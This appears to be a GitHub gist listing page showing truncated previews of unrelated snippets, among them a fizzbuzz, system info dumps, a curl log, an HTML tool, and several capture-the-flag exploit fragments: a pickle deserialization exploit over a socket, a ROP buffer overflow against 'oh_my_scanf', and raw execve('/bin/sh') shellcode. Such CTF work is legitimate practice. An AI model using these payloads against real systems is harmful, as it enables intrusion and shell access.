This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
compile: | |
$ gcc -shared -fPIC -o hook.so hook.c -ldl | |
*/ | |
#define _GNU_SOURCE | |
#include <dlfcn.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netdb.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ curl -v -L -A "Mozilla/5.0" http://www.unoh.net/ | |
* STATE: INIT => CONNECT handle 0x60002d130; line 998 (connection #-5000) | |
* About to connect() to www.unoh.net port 80 (#0) | |
* Trying 109.201.133.191... | |
* Adding handle: conn: 0x600069370 | |
* Adding handle: send: 0 | |
* Adding handle: recv: 0 | |
* Curl_addHandleToPipeline: length: 1 | |
* 0x60002d130 is at send pipe head! | |
* - Conn 0 (0x600069370) send_pipe: 1, recv_pipe: 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import cPickle | |
import subprocess | |
import base64 | |
import socket | |
s = socket.create_connection(('localhost', 5000)) | |
class Exploit(object): | |
def __reduce__(self): | |
fd = s.fileno() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import Control.Monad | |
main = | |
forM_ [1..100] $ \x -> do | |
if x `mod` 15 == 0 then | |
putStrLn "fizzbuzz" | |
else if x `mod` 5 == 0 then | |
putStrLn "buzz" | |
else if x `mod` 3 == 0 then | |
putStrLn "fizz" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# lsb_release -a | |
No LSB modules are available. | |
Distributor ID: Ubuntu | |
Description: Ubuntu 12.04.5 LTS | |
Release: 12.04 | |
Codename: precise | |
# /lib/x86_64-linux-gnu/libc.so.6 | |
GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al. | |
Copyright (C) 2012 Free Software Foundation, Inc. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ uname -a | |
Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux | |
$ lsb_release -a | |
No LSB modules are available. | |
Distributor ID: Ubuntu | |
Description: Ubuntu 14.04.1 LTS | |
Release: 14.04 | |
Codename: trusty |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from roputils import * | |
p = Proc('./oh_my_scanf') | |
#p = Proc(host='pwnable.katsudon.org', port=32100) | |
sc = Shellcode('i386') | |
buf = 'A' * 28 | |
buf += p32(0x80483e0) # push esp; ret | |
buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ') # elliminate white-space characters for scanf("%s") attack |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ uname -a | |
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux | |
$ lsb_release -a | |
No LSB modules are available. | |
Distributor ID: Ubuntu | |
Description: Ubuntu 14.04.1 LTS | |
Release: 14.04 | |
Codename: trusty |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
import socket | |
from telnetlib import Telnet | |
senryu1 = '\x8d\x48\x19\x31\xdb' | |
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90' | |
senryu3 = '\xcd\x80\xff\xe1\x90' | |
# execve("/bin/sh", {"/bin/sh", NULL}, NULL) | |
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<meta charset="UTF-8"> | |
<title>megrepper</title> | |
<body> | |
<canvas id="canvas"></canvas> | |
<div style="position: fixed; left: 160px; display: inline-block;"> | |
<h1>megrepper</h1> | |
<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag & drop a file on page</pre> | |
</div> |